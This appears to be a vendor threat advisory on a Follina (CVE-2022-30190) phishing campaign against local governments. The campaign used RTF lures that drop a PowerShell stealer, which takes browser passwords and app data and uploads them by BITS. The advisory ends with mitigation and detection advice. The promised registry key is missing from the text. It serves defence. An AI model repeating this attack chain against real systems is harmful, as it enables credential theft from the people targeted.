Local US and European governments were the targets of a phishing campaign using a payload designed to exploit CVE-2022-30190, also known as Follina. The phishing campaign contained malicious Rich Text Format (RTF) documents that would trigger the exploit when the user opened them.
These malicious documents, which used salary increase promises to bait employees into opening them, were crafted to exploit Follina and deploy a PowerShell script. This PowerShell script was written to first check if the system is a virtual machine and then steal information from the infected system. The information gathered included: saved passwords from multiple web browsers, data from other applications including email clients and chat services, and computer/domain information about the system itself. Once this information is gathered, the script uploads the data to a remote, attacker-controlled system using a Background Intelligent Transfer Service (BITS) job.
Due to the extensive recon of the PowerShell payload and the concentration of government targeting, this campaign is believed to originate from a state aligned actor. However, the specific state aligned actor performing the campaign is currently unknown.
It is highly recommended to implement Microsoft’s guidance steps to help mitigate the Follina vulnerability until it can be properly patched. The guidance recommends deleting the following Registry key after first creating a backup of it:
This recommendation can be performed via Group Policy to mitigate all systems at once or by using a command like reg.exe manually on systems. The activity performed by the malicious payload can also be detected and alerted upon. Microsoft Word executing a child msdt.exe process, PowerShell executing a number of built-in Windows reconnaissance commands in quick succession, and PowerShell executing a BITS job to a remote destination are all abnormal behaviors that can be monitored for. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these types of detection needs.
— Threat Insight (@threatinsight) June 3, 2022